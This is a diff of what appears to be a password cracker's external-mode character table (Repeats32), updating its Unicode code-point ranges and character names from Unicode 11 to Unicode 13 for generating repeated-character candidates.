while (c <= 0x9ffc) // ..to <CJK Ideograph, Last>
charset[i++] = c++;
// A000..A48F; Yi Syllables
c = 0xa000; // from YI SYLLABLE IT
@@ -1103,14 +1094,17 @@ void init()
charset[i++] = c++;
// A720..A7FF; Latin Extended-D
c = 0xa720; // from MODIFIER LETTER STRESS AND HIGH TONE
while (c <= 0xa7b9) // ..to LATIN SMALL LETTER U WITH STROKE
while (c <= 0xa7bf) // ..to LATIN SMALL LETTER GLOTTAL U
charset[i++] = c++;
c = 0xa7f7; // from LATIN EPIGRAPHIC LETTER SIDEWAYS I
c = 0xa7c2; // from LATIN CAPITAL LETTER ANGLICANA W
while (c <= 0xa7ca) // ..to LATIN SMALL LETTER S WITH SHORT STROKE OVERLAY
charset[i++] = c++;
c = 0xa7f5; // from LATIN CAPITAL LETTER REVERSED HALF H
while (c <= 0xa7ff) // ..to LATIN EPIGRAPHIC LETTER ARCHAIC M
charset[i++] = c++;
// A800..A82F; Syloti Nagri
c = 0xa800; // from SYLOTI NAGRI LETTER A
while (c <= 0xa82b) // ..to SYLOTI NAGRI POETRY MARK-4
while (c <= 0xa82c) // ..to SYLOTI NAGRI SIGN ALTERNATE HASANTA
charset[i++] = c++;
// A830..A83F; Common Indic Number Forms
c = 0xa830; // from NORTH INDIC FRACTION ONE QUARTER
@@ -1203,7 +1197,7 @@ void init()
charset[i++] = c++;
// AB30..AB6F; Latin Extended-E
c = 0xab30; // from LATIN SMALL LETTER BARRED ALPHA
while (c <= 0xab65) // ..to GREEK LETTER SMALL CAPITAL OMEGA
while (c <= 0xab6b) // ..to MODIFIER LETTER RIGHT TACK
charset[i++] = c++;
// AB70..ABBF; Cherokee Supplement
c = 0xab70; // from CHEROKEE SMALL LETTER A
+195 -89
View File
@@ -1,11 +1,11 @@
# This software is Copyright (c) 2012-2018 magnum, and it is hereby
# This software is Copyright (c) 2012-2020 magnum, and it is hereby
# released to the general public under the following terms:
# Redistribution and use in source and binary forms, with or without
# modification, are permitted.
#
# Try strings of repeated characters, Full Unicode (version 11) version
# Try strings of repeated characters, Full Unicode (version 13) version
#
# Number of candidates = 137,046 x length
# Number of candidates = 143,532 x length
#
# Note that these modes will handle --max-len differently than normal: They
# will consider number of characters as opposed to number of bytes. This
@@ -16,9 +16,14 @@
# format will be up to four bytes (two 16-bit words) due to use of surrogates
# for characters above U+FFFF. This means a format which normally handles up
# to 27 characters may be limited to only 13 characters, worst case.
#
# Note that the (newer) cracking mode --subsets=full-unicode is way faster than
# this external mode, although not as easy to adapt to smaller portions of the
# Unicode space. See doc/SUBSETS
[List.External:Repeats32]
int minlength, maxlength, maxc, length, c;
int charset[0x22000];
int charset[0x24000];
void init()
{
@@ -164,7 +169,7 @@ void init()
while (c <= 0x8b4) // ..to ARABIC LETTER KAF WITH DOT BELOW
charset[i++] = c++;
c = 0x8b6; // from ARABIC LETTER BEH WITH SMALL MEEM ABOVE
while (c <= 0x8bd) // ..to ARABIC LETTER AFRICAN NOON
while (c <= 0x8c7) // ..to ARABIC LETTER LAM WITH SMALL ARABIC LETTER TAH ABOVE
charset[i++] = c++;
c = 0x8d3; // from ARABIC SMALL LOW WAW
while (c <= 0x8ff) // ..to ARABIC MARK SIDEWAYS NOON GHUNNA
@@ -301,7 +306,7 @@ void init()
charset[i++] = 0xb48; // ORIYA VOWEL SIGN AI
charset[i++] = 0xb4b; // ORIYA VOWEL SIGN O
charset[i++] = 0xb4d; // ORIYA SIGN VIRAMA
charset[i++] = 0xb56; // ORIYA AI LENGTH MARK
charset[i++] = 0xb55; // ORIYA SIGN OVERLINE
charset[i++] = 0xb57; // ORIYA AU LENGTH MARK
charset[i++] = 0xb5c; // ORIYA LETTER RRA
charset[i++] = 0xb5d; // ORIYA LETTER RHA
@@ -374,7 +379,7 @@ void init()
c = 0xc66; // from TELUGU DIGIT ZERO
while (c <= 0xc6f) // ..to TELUGU DIGIT NINE
charset[i++] = c++;
c = 0xc78; // from TELUGU FRACTION DIGIT ZERO FOR ODD POWERS OF FOUR
c = 0xc77; // from TELUGU SIGN SIDDHAM
while (c <= 0xc7f) // ..to TELUGU SIGN TUUMU
charset[i++] = c++;
// 0C80..0CFF; Kannada
@@ -412,9 +417,6 @@ void init()
charset[i++] = 0xcf2; // KANNADA SIGN UPADHMANIYA
// 0D00..0D7F; Malayalam
c = 0xd00; // from MALAYALAM SIGN COMBINING ANUSVARA ABOVE
while (c <= 0xd03) // ..to MALAYALAM SIGN VISARGA
charset[i++] = c++;
c = 0xd05; // from MALAYALAM LETTER A
while (c <= 0xd0c) // ..to MALAYALAM LETTER VOCALIC L
charset[i++] = c++;
charset[i++] = 0xd0e; // MALAYALAM LETTER E
@@ -434,7 +436,7 @@ void init()
while (c <= 0xd7f) // ..to MALAYALAM LETTER CHILLU K
charset[i++] = c++;
// 0D80..0DFF; Sinhala
charset[i++] = 0xd82; // SINHALA SIGN ANUSVARAYA
charset[i++] = 0xd81; // SINHALA SIGN CANDRABINDU
charset[i++] = 0xd83; // SINHALA SIGN VISARGAYA
c = 0xd85; // from SINHALA LETTER AYANNA
while (c <= 0xd96) // ..to SINHALA LETTER AUYANNA
@@ -469,23 +471,15 @@ void init()
// 0E80..0EFF; Lao
charset[i++] = 0xe81; // LAO LETTER KO
charset[i++] = 0xe82; // LAO LETTER KHO SUNG
charset[i++] = 0xe87; // LAO LETTER NGO
charset[i++] = 0xe88; // LAO LETTER CO
c = 0xe94; // from LAO LETTER DO
while (c <= 0xe97) // ..to LAO LETTER THO TAM
c = 0xe86; // from LAO LETTER PALI GHA
while (c <= 0xe8a) // ..to LAO LETTER SO TAM
charset[i++] = c++;
c = 0xe99; // from LAO LETTER NO
while (c <= 0xe9f) // ..to LAO LETTER FO SUNG
c = 0xe8c; // from LAO LETTER PALI JHA
while (c <= 0xea3) // ..to LAO LETTER LO LING
charset[i++] = c++;
charset[i++] = 0xea1; // LAO LETTER MO
charset[i++] = 0xea3; // LAO LETTER LO LING
charset[i++] = 0xeaa; // LAO LETTER SO SUNG
charset[i++] = 0xeab; // LAO LETTER HO SUNG
c = 0xead; // from LAO LETTER O
while (c <= 0xeb9) // ..to LAO VOWEL SIGN UU
c = 0xea7; // from LAO LETTER WO
while (c <= 0xebd) // ..to LAO SEMIVOWEL SIGN NYO
charset[i++] = c++;
charset[i++] = 0xebb; // LAO VOWEL SIGN MAI KON
charset[i++] = 0xebd; // LAO SEMIVOWEL SIGN NYO
c = 0xec0; // from LAO VOWEL SIGN E
while (c <= 0xec4) // ..to LAO VOWEL SIGN AI
charset[i++] = c++;
@@ -711,7 +705,7 @@ void init()
charset[i++] = c++;
// 1AB0..1AFF; Combining Diacritical Marks Extended
c = 0x1ab0; // from COMBINING DOUBLED CIRCUMFLEX ACCENT
while (c <= 0x1abe) // ..to COMBINING PARENTHESES OVERLAY
while (c <= 0x1ac0) // ..to COMBINING LATIN SMALL LETTER TURNED W BELOW
charset[i++] = c++;
// 1B00..1B7F; Balinese
c = 0x1b00; // from BALINESE SIGN ULU RICEM
@@ -760,7 +754,7 @@ void init()
charset[i++] = c++;
// 1CD0..1CFF; Vedic Extensions
c = 0x1cd0; // from VEDIC TONE KARSHANA
while (c <= 0x1cf9) // ..to VEDIC TONE DOUBLE RING ABOVE
while (c <= 0x1cfa) // ..to VEDIC SIGN DOUBLE ANUSVARA ANTARGOMUKHA
charset[i++] = c++;
// 1D00..1D7F; Phonetic Extensions
c = 0x1d00; // from LATIN LETTER SMALL CAPITAL A
@@ -927,11 +921,8 @@ void init()
c = 0x2b76; // from NORTH WEST TRIANGLE-HEADED ARROW TO BAR
while (c <= 0x2b95) // ..to RIGHTWARDS BLACK ARROW
charset[i++] = c++;
c = 0x2b98; // from THREE-D TOP-LIGHTED LEFTWARDS EQUILATERAL ARROWHEAD
while (c <= 0x2bc8) // ..to BLACK MEDIUM RIGHT-POINTING TRIANGLE CENTRED
charset[i++] = c++;
c = 0x2bca; // from TOP HALF BLACK CIRCLE
while (c <= 0x2bfe) // ..to REVERSED RIGHT ANGLE
c = 0x2b97; // from SYMBOL FOR TYPE A ELECTRONICS
while (c <= 0x2bff) // ..to HELLSCHREIBER PAUSE SYMBOL
charset[i++] = c++;
// 2C00..2C5F; Glagolitic
c = 0x2c00; // from GLAGOLITIC CAPITAL LETTER AZU
@@ -999,7 +990,7 @@ void init()
charset[i++] = c++;
// 2E00..2E7F; Supplemental Punctuation
c = 0x2e00; // from RIGHT ANGLE SUBSTITUTION MARKER
while (c <= 0x2e4e) // ..to PUNCTUS ELEVATUS MARK
while (c <= 0x2e52) // ..to TIRONIAN SIGN CAPITAL ET
charset[i++] = c++;
// 2E80..2EFF; CJK Radicals Supplement
c = 0x2e80; // from CJK RADICAL REPEAT
@@ -1045,7 +1036,7 @@ void init()
charset[i++] = c++;
// 31A0..31BF; Bopomofo Extended
c = 0x31a0; // from BOPOMOFO LETTER BU
while (c <= 0x31ba) // ..to BOPOMOFO LETTER ZY
while (c <= 0x31bf) // ..to BOPOMOFO LETTER AH
charset[i++] = c++;
// 31C0..31EF; CJK Strokes
c = 0x31c0; // from CJK STROKE T
@@ -1060,7 +1051,7 @@ void init()
while (c <= 0x321e) // ..to PARENTHESIZED KOREAN CHARACTER O HU
charset[i++] = c++;
c = 0x3220; // from PARENTHESIZED IDEOGRAPH ONE
while (c <= 0x32fe) // ..to CIRCLED KATAKANA WO
while (c <= 0x32ff) // ..to SQUARE ERA NAME REIWA
charset[i++] = c++;
// 3300..33FF; CJK Compatibility
c = 0x3300; // from SQUARE APAATO
@@ -1068,7 +1059,7 @@ void init()
charset[i++] = c++;
// 3400..4DBF; CJK Unified Ideographs Extension A
c = 0x3400; // from <CJK Ideograph Extension A, First>
while (c <= 0x4db5) // ..to <CJK Ideograph Extension A, Last>
while (c <= 0x4dbf) // ..to <CJK Ideograph Extension A, Last>
charset[i++] = c++;
// 4DC0..4DFF; Yijing Hexagram Symbols
c = 0x4dc0; // from HEXAGRAM FOR THE CREATIVE HEAVEN
@@ -1076,7 +1067,7 @@ void init()
charset[i++] = c++;
// 4E00..9FFF; CJK Unified Ideographs
c = 0x4e00; // from <CJK Ideograph, First>
while (c <= 0x9fef) // ..to <CJK Ideograph, Last>
while (c <= 0x9ffc) // ..to <CJK Ideograph, Last>
charset[i++] = c++;
// A000..A48F; Yi Syllables
c = 0xa000; // from YI SYLLABLE IT
@@ -1108,14 +1099,17 @@ void init()
charset[i++] = c++;
// A720..A7FF; Latin Extended-D
c = 0xa720; // from MODIFIER LETTER STRESS AND HIGH TONE
while (c <= 0xa7b9) // ..to LATIN SMALL LETTER U WITH STROKE
while (c <= 0xa7bf) // ..to LATIN SMALL LETTER GLOTTAL U
charset[i++] = c++;
c = 0xa7f7; // from LATIN EPIGRAPHIC LETTER SIDEWAYS I
c = 0xa7c2; // from LATIN CAPITAL LETTER ANGLICANA W
while (c <= 0xa7ca) // ..to LATIN SMALL LETTER S WITH SHORT STROKE OVERLAY
charset[i++] = c++;
c = 0xa7f5; // from LATIN CAPITAL LETTER REVERSED HALF H
while (c <= 0xa7ff) // ..to LATIN EPIGRAPHIC LETTER ARCHAIC M
charset[i++] = c++;
// A800..A82F; Syloti Nagri
c = 0xa800; // from SYLOTI NAGRI LETTER A
while (c <= 0xa82b) // ..to SYLOTI NAGRI POETRY MARK-4
while (c <= 0xa82c) // ..to SYLOTI NAGRI SIGN ALTERNATE HASANTA
charset[i++] = c++;
// A830..A83F; Common Indic Number Forms
c = 0xa830; // from NORTH INDIC FRACTION ONE QUARTER
@@ -1208,7 +1202,7 @@ void init()
charset[i++] = c++;
// AB30..AB6F; Latin Extended-E
c = 0xab30; // from LATIN SMALL LETTER BARRED ALPHA
while (c <= 0xab65) // ..to GREEK LETTER SMALL CAPITAL OMEGA
while (c <= 0xab6b) // ..to MODIFIER LETTER RIGHT TACK
charset[i++] = c++;
// AB70..ABBF; Cherokee Supplement
c = 0xab70; // from CHEROKEE SMALL LETTER A
@@ -1374,7 +1368,7 @@ void init()
charset[i++] = c++;
// 10190..101CF; Ancient Symbols
c = 0x10190; // from ROMAN SEXTANS SIGN
while (c <= 0x1019b) // ..to ROMAN CENTURIAL SIGN
while (c <= 0x1019c) // ..to ASCIA SYMBOL
charset[i++] = c++;
charset[i++] = 0x101a0; // GREEK SYMBOL TAU RHO
// 101D0..101FF; Phaistos Disc
@@ -1616,6 +1610,14 @@ void init()
c = 0x10e60; // from RUMI DIGIT ONE
while (c <= 0x10e7e) // ..to RUMI FRACTION TWO THIRDS
charset[i++] = c++;
// 10E80..10EBF; Yezidi
c = 0x10e80; // from YEZIDI LETTER ELIF
while (c <= 0x10ea9) // ..to YEZIDI LETTER ET
charset[i++] = c++;
charset[i++] = 0x10eab; // YEZIDI COMBINING HAMZA MARK
charset[i++] = 0x10ead; // YEZIDI HYPHENATION MARK
charset[i++] = 0x10eb0; // YEZIDI LETTER LAM WITH DOT ABOVE
charset[i++] = 0x10eb1; // YEZIDI LETTER YOT WITH CIRCUMFLEX ABOVE
// 10F00..10F2F; Old Sogdian
c = 0x10f00; // from OLD SOGDIAN LETTER ALEPH
while (c <= 0x10f27) // ..to OLD SOGDIAN LIGATURE AYIN-DALETH
@@ -1624,6 +1626,14 @@ void init()
c = 0x10f30; // from SOGDIAN LETTER ALEPH
while (c <= 0x10f59) // ..to SOGDIAN PUNCTUATION HALF CIRCLE WITH DOT
charset[i++] = c++;
// 10FB0..10FDF; Chorasmian
c = 0x10fb0; // from CHORASMIAN LETTER ALEPH
while (c <= 0x10fcb) // ..to CHORASMIAN NUMBER ONE HUNDRED
charset[i++] = c++;
// 10FE0..10FFF; Elymaic
c = 0x10fe0; // from ELYMAIC LETTER ALEPH
while (c <= 0x10ff6) // ..to ELYMAIC LIGATURE ZAYIN-YODH
charset[i++] = c++;
// 11000..1107F; Brahmi
c = 0x11000; // from BRAHMI SIGN CANDRABINDU
while (c <= 0x1104d) // ..to BRAHMI PUNCTUATION LOTUS
@@ -1649,7 +1659,7 @@ void init()
while (c <= 0x11134) // ..to CHAKMA MAAYYAA
charset[i++] = c++;
c = 0x11136; // from CHAKMA DIGIT ZERO
while (c <= 0x11146) // ..to CHAKMA VOWEL SIGN EI
while (c <= 0x11147) // ..to CHAKMA LETTER VAA
charset[i++] = c++;
// 11150..1117F; Mahajani
c = 0x11150; // from MAHAJANI LETTER A
@@ -1657,9 +1667,6 @@ void init()
charset[i++] = c++;
// 11180..111DF; Sharada
c = 0x11180; // from SHARADA SIGN CANDRABINDU
while (c <= 0x111cd) // ..to SHARADA SUTRA MARK
charset[i++] = c++;
c = 0x111d0; // from SHARADA DIGIT ZERO
while (c <= 0x111df) // ..to SHARADA SECTION MARK-2
charset[i++] = c++;
// 111E0..111FF; Sinhala Archaic Numbers
@@ -1731,10 +1738,11 @@ void init()
charset[i++] = c++;
// 11400..1147F; Newa
c = 0x11400; // from NEWA LETTER A
while (c <= 0x11459) // ..to NEWA DIGIT NINE
while (c <= 0x1145b) // ..to NEWA PLACEHOLDER MARK
charset[i++] = c++;
c = 0x1145d; // from NEWA INSERTION SIGN
while (c <= 0x11461) // ..to NEWA SIGN UPADHMANIYA
charset[i++] = c++;
charset[i++] = 0x1145d; // NEWA INSERTION SIGN
charset[i++] = 0x1145e; // NEWA SANDHI MARK
// 11480..114DF; Tirhuta
c = 0x11480; // from TIRHUTA ANJI
while (c <= 0x114c7) // ..to TIRHUTA OM
@@ -1762,7 +1770,7 @@ void init()
charset[i++] = c++;
// 11680..116CF; Takri
c = 0x11680; // from TAKRI LETTER A
while (c <= 0x116b7) // ..to TAKRI SIGN NUKTA
while (c <= 0x116b8) // ..to TAKRI LETTER ARCHAIC KHA
charset[i++] = c++;
c = 0x116c0; // from TAKRI DIGIT ZERO
while (c <= 0x116c9) // ..to TAKRI DIGIT NINE
@@ -1786,15 +1794,42 @@ void init()
while (c <= 0x118f2) // ..to WARANG CITI NUMBER NINETY
charset[i++] = c++;
charset[i++] = 0x118ff; // WARANG CITI OM
// 11900..1195F; Dives Akuru
c = 0x11900; // from DIVES AKURU LETTER A
while (c <= 0x11906) // ..to DIVES AKURU LETTER E
charset[i++] = c++;
c = 0x1190c; // from DIVES AKURU LETTER KA
while (c <= 0x11913) // ..to DIVES AKURU LETTER JA
charset[i++] = c++;
charset[i++] = 0x11915; // DIVES AKURU LETTER NYA
charset[i++] = 0x11916; // DIVES AKURU LETTER TTA
c = 0x11918; // from DIVES AKURU LETTER DDA
while (c <= 0x11935) // ..to DIVES AKURU VOWEL SIGN E
charset[i++] = c++;
charset[i++] = 0x11937; // DIVES AKURU VOWEL SIGN AI
charset[i++] = 0x11938; // DIVES AKURU VOWEL SIGN O
c = 0x1193b; // from DIVES AKURU SIGN ANUSVARA
while (c <= 0x11946) // ..to DIVES AKURU END OF TEXT MARK
charset[i++] = c++;
c = 0x11950; // from DIVES AKURU DIGIT ZERO
while (c <= 0x11959) // ..to DIVES AKURU DIGIT NINE
charset[i++] = c++;
// 119A0..119FF; Nandinagari
c = 0x119a0; // from NANDINAGARI LETTER A
while (c <= 0x119a7) // ..to NANDINAGARI LETTER VOCALIC RR
charset[i++] = c++;
c = 0x119aa; // from NANDINAGARI LETTER E
while (c <= 0x119d7) // ..to NANDINAGARI VOWEL SIGN VOCALIC RR
charset[i++] = c++;
c = 0x119da; // from NANDINAGARI VOWEL SIGN E
while (c <= 0x119e4) // ..to NANDINAGARI VOWEL SIGN PRISHTHAMATRA E
charset[i++] = c++;
// 11A00..11A4F; Zanabazar Square
c = 0x11a00; // from ZANABAZAR SQUARE LETTER A
while (c <= 0x11a47) // ..to ZANABAZAR SQUARE SUBJOINER
charset[i++] = c++;
// 11A50..11AAF; Soyombo
c = 0x11a50; // from SOYOMBO LETTER A
while (c <= 0x11a83) // ..to SOYOMBO LETTER KSSA
charset[i++] = c++;
c = 0x11a86; // from SOYOMBO CLUSTER-INITIAL LETTER RA
while (c <= 0x11aa2) // ..to SOYOMBO TERMINAL MARK-2
charset[i++] = c++;
// 11AC0..11AFF; Pau Cin Hau
@@ -1862,6 +1897,13 @@ void init()
c = 0x11ee0; // from MAKASAR LETTER KA
while (c <= 0x11ef8) // ..to MAKASAR END OF SECTION
charset[i++] = c++;
// 11FB0..11FBF; Lisu Supplement
charset[i++] = 0x11fb0; // LISU LETTER YHA
// 11FC0..11FFF; Tamil Supplement
c = 0x11fc0; // from TAMIL FRACTION ONE THREE-HUNDRED-AND-TWENTIETH
while (c <= 0x11ff1) // ..to TAMIL SIGN VAKAIYARAA
charset[i++] = c++;
charset[i++] = 0x11fff; // TAMIL PUNCTUATION END OF TEXT
// 12000..123FF; Cuneiform
c = 0x12000; // from CUNEIFORM SIGN A
while (c <= 0x12399) // ..to CUNEIFORM SIGN U U
@@ -1881,6 +1923,10 @@ void init()
c = 0x13000; // from EGYPTIAN HIEROGLYPH A001
while (c <= 0x1342e) // ..to EGYPTIAN HIEROGLYPH AA032
charset[i++] = c++;
// 13430..1343F; Egyptian Hieroglyph Format Controls
c = 0x13430; // from EGYPTIAN HIEROGLYPH VERTICAL JOINER
while (c <= 0x13438) // ..to EGYPTIAN HIEROGLYPH END SEGMENT
charset[i++] = c++;
// 14400..1467F; Anatolian Hieroglyphs
c = 0x14400; // from ANATOLIAN HIEROGLYPH A001
while (c <= 0x14646) // ..to ANATOLIAN HIEROGLYPH A530
@@ -1927,24 +1973,35 @@ void init()
charset[i++] = c++;
// 16F00..16F9F; Miao
c = 0x16f00; // from MIAO LETTER PA
while (c <= 0x16f44) // ..to MIAO LETTER HHA
while (c <= 0x16f4a) // ..to MIAO LETTER RTE
charset[i++] = c++;
c = 0x16f50; // from MIAO LETTER NASALIZATION
while (c <= 0x16f7e) // ..to MIAO VOWEL SIGN NG
c = 0x16f4f; // from MIAO SIGN CONSONANT MODIFIER BAR
while (c <= 0x16f87) // ..to MIAO VOWEL SIGN UI
charset[i++] = c++;
c = 0x16f8f; // from MIAO TONE RIGHT
while (c <= 0x16f9f) // ..to MIAO LETTER REFORMED TONE-8
charset[i++] = c++;
// 16FE0..16FFF; Ideographic Symbols and Punctuation
charset[i++] = 0x16fe0; // TANGUT ITERATION MARK
charset[i++] = 0x16fe1; // NUSHU ITERATION MARK
c = 0x16fe0; // from TANGUT ITERATION MARK
while (c <= 0x16fe4) // ..to KHITAN SMALL SCRIPT FILLER
charset[i++] = c++;
charset[i++] = 0x16ff0; // VIETNAMESE ALTERNATE READING MARK CA
charset[i++] = 0x16ff1; // VIETNAMESE ALTERNATE READING MARK NHAY
// 17000..187FF; Tangut
c = 0x17000; // from <Tangut Ideograph, First>
while (c <= 0x187f1) // ..to <Tangut Ideograph, Last>
while (c <= 0x187f7) // ..to <Tangut Ideograph, Last>
charset[i++] = c++;
// 18800..18AFF; Tangut Components
c = 0x18800; // from TANGUT COMPONENT-001
while (c <= 0x18af2) // ..to TANGUT COMPONENT-755
while (c <= 0x18aff) // ..to TANGUT COMPONENT-768
charset[i++] = c++;
// 18B00..18CFF; Khitan Small Script
c = 0x18b00; // from KHITAN SMALL SCRIPT CHARACTER-18B00
while (c <= 0x18cd5) // ..to KHITAN SMALL SCRIPT CHARACTER-18CD5
charset[i++] = c++;
// 18D00..18D8F; Tangut Supplement
c = 0x18d00; // from <Tangut Ideograph Supplement, First>
while (c <= 0x18d08) // ..to <Tangut Ideograph Supplement, Last>
charset[i++] = c++;
// 1B000..1B0FF; Kana Supplement
c = 0x1b000; // from KATAKANA LETTER ARCHAIC E
@@ -1954,6 +2011,12 @@ void init()
c = 0x1b100; // from HENTAIGANA LETTER RE-3
while (c <= 0x1b11e) // ..to HENTAIGANA LETTER N-MU-MO-2
charset[i++] = c++;
// 1B130..1B16F; Small Kana Extension
charset[i++] = 0x1b150; // HIRAGANA LETTER SMALL WI
charset[i++] = 0x1b152; // HIRAGANA LETTER SMALL WO
c = 0x1b164; // from KATAKANA LETTER SMALL WI
while (c <= 0x1b167) // ..to KATAKANA LETTER SMALL N
charset[i++] = c++;
// 1B170..1B2FF; Nushu
c = 0x1b170; // from NUSHU CHARACTER-1B170
while (c <= 0x1b2fb) // ..to NUSHU CHARACTER-1B2FB
@@ -2083,6 +2146,23 @@ void init()
c = 0x1e026; // from COMBINING GLAGOLITIC LETTER YO
while (c <= 0x1e02a) // ..to COMBINING GLAGOLITIC LETTER FITA
charset[i++] = c++;
// 1E100..1E14F; Nyiakeng Puachue Hmong
c = 0x1e100; // from NYIAKENG PUACHUE HMONG LETTER MA
while (c <= 0x1e12c) // ..to NYIAKENG PUACHUE HMONG LETTER W
charset[i++] = c++;
c = 0x1e130; // from NYIAKENG PUACHUE HMONG TONE-B
while (c <= 0x1e13d) // ..to NYIAKENG PUACHUE HMONG SYLLABLE LENGTHENER
charset[i++] = c++;
c = 0x1e140; // from NYIAKENG PUACHUE HMONG DIGIT ZERO
while (c <= 0x1e149) // ..to NYIAKENG PUACHUE HMONG DIGIT NINE
charset[i++] = c++;
charset[i++] = 0x1e14e; // NYIAKENG PUACHUE HMONG LOGOGRAM NYAJ
charset[i++] = 0x1e14f; // NYIAKENG PUACHUE HMONG CIRCLED CA
// 1E2C0..1E2FF; Wancho
c = 0x1e2c0; // from WANCHO LETTER AA
while (c <= 0x1e2f9) // ..to WANCHO DIGIT NINE
charset[i++] = c++;
charset[i++] = 0x1e2ff; // WANCHO NGUN SIGN
// 1E800..1E8DF; Mende Kikakui
c = 0x1e800; // from MENDE KIKAKUI SYLLABLE M001 KI
while (c <= 0x1e8c4) // ..to MENDE KIKAKUI SYLLABLE M060 NYON
@@ -2092,7 +2172,7 @@ void init()
charset[i++] = c++;
// 1E900..1E95F; Adlam
c = 0x1e900; // from ADLAM CAPITAL LETTER ALIF
while (c <= 0x1e94a) // ..to ADLAM NUKTA
while (c <= 0x1e94b) // ..to ADLAM NASALIZATION MARK
charset[i++] = c++;
c = 0x1e950; // from ADLAM DIGIT ZERO
while (c <= 0x1e959) // ..to ADLAM DIGIT NINE
@@ -2103,6 +2183,10 @@ void init()
c = 0x1ec71; // from INDIC SIYAQ NUMBER ONE
while (c <= 0x1ecb4) // ..to INDIC SIYAQ ALTERNATE LAKH MARK
charset[i++] = c++;
// 1ED00..1ED4F; Ottoman Siyaq Numbers
c = 0x1ed01; // from OTTOMAN SIYAQ NUMBER ONE
while (c <= 0x1ed3d) // ..to OTTOMAN SIYAQ FRACTION ONE SIXTH
charset[i++] = c++;
// 1EE00..1EEFF; Arabic Mathematical Alphabetic Symbols
c = 0x1ee00; // from ARABIC MATHEMATICAL ALEF
while (c <= 0x1ee03) // ..to ARABIC MATHEMATICAL DAL
@@ -2175,13 +2259,7 @@ void init()
charset[i++] = c++;
// 1F100..1F1FF; Enclosed Alphanumeric Supplement
c = 0x1f100; // from DIGIT ZERO FULL STOP
while (c <= 0x1f10c) // ..to DINGBAT NEGATIVE CIRCLED SANS-SERIF DIGIT ZERO
charset[i++] = c++;
c = 0x1f110; // from PARENTHESIZED LATIN CAPITAL LETTER A
while (c <= 0x1f16b) // ..to RAISED MD SIGN
charset[i++] = c++;
c = 0x1f170; // from NEGATIVE SQUARED LATIN CAPITAL LETTER A
while (c <= 0x1f1ac) // ..to SQUARED VOD
while (c <= 0x1f1ad) // ..to MASK WORK SYMBOL
charset[i++] = c++;
c = 0x1f1e6; // from REGIONAL INDICATOR SYMBOL LETTER A
while (c <= 0x1f1ff) // ..to REGIONAL INDICATOR SYMBOL LETTER Z
@@ -2214,13 +2292,13 @@ void init()
charset[i++] = c++;
// 1F680..1F6FF; Transport and Map Symbols
c = 0x1f680; // from ROCKET
while (c <= 0x1f6d4) // ..to PAGODA
while (c <= 0x1f6d7) // ..to ELEVATOR
charset[i++] = c++;
c = 0x1f6e0; // from HAMMER AND WRENCH
while (c <= 0x1f6ec) // ..to AIRPLANE ARRIVING
charset[i++] = c++;
c = 0x1f6f0; // from SATELLITE
while (c <= 0x1f6f9) // ..to SKATEBOARD
while (c <= 0x1f6fc) // ..to ROLLER SKATE
charset[i++] = c++;
// 1F700..1F77F; Alchemical Symbols
c = 0x1f700; // from ALCHEMICAL SYMBOL FOR QUINTESSENCE
@@ -2230,6 +2308,9 @@ void init()
c = 0x1f780; // from BLACK LEFT-POINTING ISOSCELES RIGHT TRIANGLE
while (c <= 0x1f7d8) // ..to NEGATIVE CIRCLED SQUARE
charset[i++] = c++;
c = 0x1f7e0; // from LARGE ORANGE CIRCLE
while (c <= 0x1f7eb) // ..to LARGE BROWN SQUARE
charset[i++] = c++;
// 1F800..1F8FF; Supplemental Arrows-C
c = 0x1f800; // from LEFTWARDS ARROW WITH SMALL TRIANGLE ARROWHEAD
while (c <= 0x1f80b) // ..to DOWNWARDS ARROW WITH LARGE TRIANGLE ARROWHEAD
@@ -2246,37 +2327,58 @@ void init()
c = 0x1f890; // from LEFTWARDS TRIANGLE ARROWHEAD
while (c <= 0x1f8ad) // ..to WHITE ARROW SHAFT WIDTH TWO THIRDS
charset[i++] = c++;
charset[i++] = 0x1f8b0; // ARROW POINTING UPWARDS THEN NORTH WEST
charset[i++] = 0x1f8b1; // ARROW POINTING RIGHTWARDS THEN CURVING SOUTH WEST
// 1F900..1F9FF; Supplemental Symbols and Pictographs
c = 0x1f900; // from CIRCLED CROSS FORMEE WITH FOUR DOTS
while (c <= 0x1f90b) // ..to DOWNWARD FACING NOTCHED HOOK WITH DOT
while (c <= 0x1f978) // ..to DISGUISED FACE
charset[i++] = c++;
c = 0x1f910; // from ZIPPER-MOUTH FACE
while (c <= 0x1f93e) // ..to HANDBALL
c = 0x1f97a; // from FACE WITH PLEADING EYES
while (c <= 0x1f9cb) // ..to BUBBLE TEA
charset[i++] = c++;
c = 0x1f940; // from WILTED FLOWER
while (c <= 0x1f970) // ..to SMILING FACE WITH SMILING EYES AND THREE HEARTS
charset[i++] = c++;
c = 0x1f973; // from FACE WITH PARTY HORN AND PARTY HAT
while (c <= 0x1f976) // ..to FREEZING FACE
charset[i++] = c++;
c = 0x1f97c; // from LAB COAT
while (c <= 0x1f9a2) // ..to SWAN
charset[i++] = c++;
c = 0x1f9b0; // from EMOJI COMPONENT RED HAIR
while (c <= 0x1f9b9) // ..to SUPERVILLAIN
charset[i++] = c++;
charset[i++] = 0x1f9c0; // CHEESE WEDGE
charset[i++] = 0x1f9c2; // SALT SHAKER
c = 0x1f9d0; // from FACE WITH MONOCLE
c = 0x1f9cd; // from STANDING PERSON
while (c <= 0x1f9ff) // ..to NAZAR AMULET
charset[i++] = c++;
// 1FA00..1FA6F; Chess Symbols
c = 0x1fa00; // from NEUTRAL CHESS KING
while (c <= 0x1fa53) // ..to BLACK CHESS KNIGHT-BISHOP
charset[i++] = c++;
c = 0x1fa60; // from XIANGQI RED GENERAL
while (c <= 0x1fa6d) // ..to XIANGQI BLACK SOLDIER
charset[i++] = c++;
// 1FA70..1FAFF; Symbols and Pictographs Extended-A
c = 0x1fa70; // from BALLET SHOES
while (c <= 0x1fa74) // ..to THONG SANDAL
charset[i++] = c++;
charset[i++] = 0x1fa78; // DROP OF BLOOD
charset[i++] = 0x1fa7a; // STETHOSCOPE
c = 0x1fa80; // from YO-YO
while (c <= 0x1fa86) // ..to NESTING DOLLS
charset[i++] = c++;
c = 0x1fa90; // from RINGED PLANET
while (c <= 0x1faa8) // ..to ROCK
charset[i++] = c++;
c = 0x1fab0; // from FLY
while (c <= 0x1fab6) // ..to FEATHER
charset[i++] = c++;
charset[i++] = 0x1fac0; // ANATOMICAL HEART
charset[i++] = 0x1fac2; // PEOPLE HUGGING
c = 0x1fad0; // from BLUEBERRIES
while (c <= 0x1fad6) // ..to TEAPOT
charset[i++] = c++;
// 1FB00..1FBFF; Symbols for Legacy Computing
